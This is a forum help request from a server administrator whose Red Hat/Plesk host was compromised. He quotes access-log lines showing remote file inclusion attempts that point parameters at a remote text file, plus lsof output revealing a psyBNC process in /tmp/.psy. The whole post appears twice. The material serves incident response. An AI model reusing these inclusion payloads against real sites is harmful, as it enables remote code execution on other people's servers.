S
sysoptech
Guest
Hi:
After my server hosting provider complained about an http exploitation attempt from my server to www.attackeddomain.com (I made up that domain to protect the innocent):
my.server.ip.address. - - [18/Jan/2009:00:08:53 +0200]"GET /forum/?cfg[bbs_dir]=http://www.attackeddomain.com/sik.txt? HTTP/1.1" 30$
my.server.ip.address - - [18/Jan/2009:00:08:53 +0200]"GET /forum/install/index.php HTTP/1.1" 404 111 "-""libwww-perl/5.805"
my.server.ip.address - - [18/Jan/2009:00:08:53 +0200]"GET /?cfg[bbs_dir]=http://www..attackeddomain.com/sik.txt? HTTP/1.1" 200 1257$2
I checked in my server and found entries like this in httpd/apache access_log:
127.0.0.1 - - [27/Jan/2009:15:23:46 -0600] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.attackeddomain.com/sik.txt%3f HTTP/1.1" 403 3985 "-" "libwww-perl/5.805"
127.0.0.1 - - [27/Jan/2009:15:54:41 -0600] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.attackeddomain.com/sik.txt%3f HTTP/1.1" 403 3985 "-" "libwww-perl/5.805"
127.0.0.1 - - [27/Jan/2009:16:20:40 -0600] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.attackeddomain.com/sik.txt%3f HTTP/1.1" 403 3985 "-" "libwww-perl/5.805"
I've just found the following using lsof
psybnc 4863 apache cwd DIR 3,3 4096 12681232 /tmp/.psy
psybnc 4863 apache rtd DIR 3,3 4096 2 /
psybnc 4863 apache txt REG 3,3 202544 12681344 /tmp/.psy/psybnc (deleted)
psybnc 4863 apache mem REG 3,3 125736 14680066 /lib/ld-2.5.so
psybnc 4863 apache mem REG 3,3 1602128 14680082 /lib/libc-2.5.so
psybnc 4863 apache mem REG 3,3 208352 14680099 /lib/libm-2.5.so
psybnc 4863 apache mem REG 3,3 76400 14680121 /lib/libresolv-2.5.so
psybnc 4863 apache mem REG 3,3 21788 14680102 /lib/libnss_dns-2.5.so
psybnc 4863 apache mem REG 3,3 46680 14680104 /lib/libnss_files-2.5.so
psybnc 4863 apache 0r FIFO 0,6 14823 pipe
psybnc 4863 apache 1w CHR 1,3 1168 /dev/null
psybnc 4863 apache 2w CHR 1,3 1168 /dev/null
psybnc 4863 apache 3u IPv4 14844 TCP *:dc (LISTEN)
psybnc 4863 apache 4w REG 3,3 1222 12681223 /tmp/.psy/log/psybnc.log (deleted)
psybnc 4863 apache 5w REG 3,3 6 12681341 /tmp/.psy/psybnc.pid
psybnc 4863 apache 6w REG 3,3 0 12681226 /tmp/.psy/log/USER1.TRL
psybnc 4863 apache 7u sock 0,5 2613780 can't identify protocol
My server is a Red Hat Enterprise Linux Server release 5.2 with Plesk 8.6 that I use to host virtual domains.
My guess is that someone used a script to get access to my server and installed psybnc. I don't know how to get rid of psybnc and how to make sure that there's no other software the bad guys may have installed. I would need to know how to prevent this to happen again in my server.
Can anyone give me some tips?
Best Regards
Raul
After my server hosting provider complained about an http exploitation attempt from my server to www.attackeddomain.com (I made up that domain to protect the innocent):
my.server.ip.address. - - [18/Jan/2009:00:08:53 +0200]"GET /forum/?cfg[bbs_dir]=http://www.attackeddomain.com/sik.txt? HTTP/1.1" 30$
my.server.ip.address - - [18/Jan/2009:00:08:53 +0200]"GET /forum/install/index.php HTTP/1.1" 404 111 "-""libwww-perl/5.805"
my.server.ip.address - - [18/Jan/2009:00:08:53 +0200]"GET /?cfg[bbs_dir]=http://www..attackeddomain.com/sik.txt? HTTP/1.1" 200 1257$2
I checked in my server and found entries like this in httpd/apache access_log:
127.0.0.1 - - [27/Jan/2009:15:23:46 -0600] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.attackeddomain.com/sik.txt%3f HTTP/1.1" 403 3985 "-" "libwww-perl/5.805"
127.0.0.1 - - [27/Jan/2009:15:54:41 -0600] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.attackeddomain.com/sik.txt%3f HTTP/1.1" 403 3985 "-" "libwww-perl/5.805"
127.0.0.1 - - [27/Jan/2009:16:20:40 -0600] "GET /?_SERVER%5bDOCUMENT_ROOT%5d=http://www.attackeddomain.com/sik.txt%3f HTTP/1.1" 403 3985 "-" "libwww-perl/5.805"
I've just found the following using lsof
psybnc 4863 apache cwd DIR 3,3 4096 12681232 /tmp/.psy
psybnc 4863 apache rtd DIR 3,3 4096 2 /
psybnc 4863 apache txt REG 3,3 202544 12681344 /tmp/.psy/psybnc (deleted)
psybnc 4863 apache mem REG 3,3 125736 14680066 /lib/ld-2.5.so
psybnc 4863 apache mem REG 3,3 1602128 14680082 /lib/libc-2.5.so
psybnc 4863 apache mem REG 3,3 208352 14680099 /lib/libm-2.5.so
psybnc 4863 apache mem REG 3,3 76400 14680121 /lib/libresolv-2.5.so
psybnc 4863 apache mem REG 3,3 21788 14680102 /lib/libnss_dns-2.5.so
psybnc 4863 apache mem REG 3,3 46680 14680104 /lib/libnss_files-2.5.so
psybnc 4863 apache 0r FIFO 0,6 14823 pipe
psybnc 4863 apache 1w CHR 1,3 1168 /dev/null
psybnc 4863 apache 2w CHR 1,3 1168 /dev/null
psybnc 4863 apache 3u IPv4 14844 TCP *:dc (LISTEN)
psybnc 4863 apache 4w REG 3,3 1222 12681223 /tmp/.psy/log/psybnc.log (deleted)
psybnc 4863 apache 5w REG 3,3 6 12681341 /tmp/.psy/psybnc.pid
psybnc 4863 apache 6w REG 3,3 0 12681226 /tmp/.psy/log/USER1.TRL
psybnc 4863 apache 7u sock 0,5 2613780 can't identify protocol
My server is a Red Hat Enterprise Linux Server release 5.2 with Plesk 8.6 that I use to host virtual domains.
My guess is that someone used a script to get access to my server and installed psybnc. I don't know how to get rid of psybnc and how to make sure that there's no other software the bad guys may have installed. I would need to know how to prevent this to happen again in my server.
Can anyone give me some tips?
Best Regards
Raul